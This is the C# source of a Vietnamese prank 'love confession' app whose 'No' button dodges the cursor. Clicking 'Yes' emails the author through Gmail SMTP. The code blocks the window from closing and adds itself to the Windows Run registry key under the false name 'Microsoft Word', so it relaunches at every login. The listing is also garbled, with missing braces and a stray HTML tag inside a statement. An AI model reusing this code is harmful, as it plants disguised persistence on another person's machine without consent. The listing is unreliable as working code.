```
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Net.Mail;
using System.Net;
using System.IO;
using Microsoft.Win32;
using System.Threading;
namespace ToTinh
{
   public partial class Form1 : Form
        public Form1()
            InitializeComponent();
            startWithOs();
        }
        static Random rd = new Random();
        private void BtnNo_MouseHover(object sender, EventArgs e)
            BtnNo.Location = new Point(rd.Next(0, 350), rd.Next(0, 350));
        }
        private void BtnNo_Click(object sender, EventArgs e)
            BtnNo.Location = new Point(rd.Next(0, 250), rd.Next(0, 250));
        }
        private void btnYes_Click(object sender, EventArgs e)
            btnYes.BackColor = Color.Red;
            try
            {
                MailMessage mail = new MailMessage();
                SmtpClient sever = new SmtpClient("smtp.gmail.com");
                mail.From = new MailAddress("địa chỉ gmail gửi mail");
                mail.To.Add("địa chỉ nhận mail");
                mail.Subject = "Phản hồi từ crush: ";
                mail.Body = "Crush bảo: Đồng ý <3";
                sever.Port = 587;
                sever.Credentials = new System.Net.NetworkCredential("địa chỉ mail gửi
(giống như trên)", "mật khẩu mail gửi");
                sever.EnableSsl = true;
                sever.Send(mail);
                MessageBox.Show("<3");</pre>
                Thread.Sleep(5000);
                Environment.Exit(0);
            catch (Exception hi)
```

```
MessageBox.Show(hi.ToString());
            }
        }
        private void Form1_FormClosing(object sender, FormClosingEventArgs e)
            e.Cancel = true;
        }
        static void startWithOs()
            RegistryKey regkey = Registry.CurrentUser.CreateSubKey("Software\\Microsoft
Word");
            RegistryKey regstart =
Registry.CurrentUser.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
            string keyvalue = "1";
            try
            {
                regkey.SetValue("Index", keyvalue);
                regstart.SetValue("Microsoft Word", Application.StartupPath + "\\" +
Application.ProductName + ".exe");
                regkey.Close();
            catch (System.Exception ex)
            }
        }
    }
}
```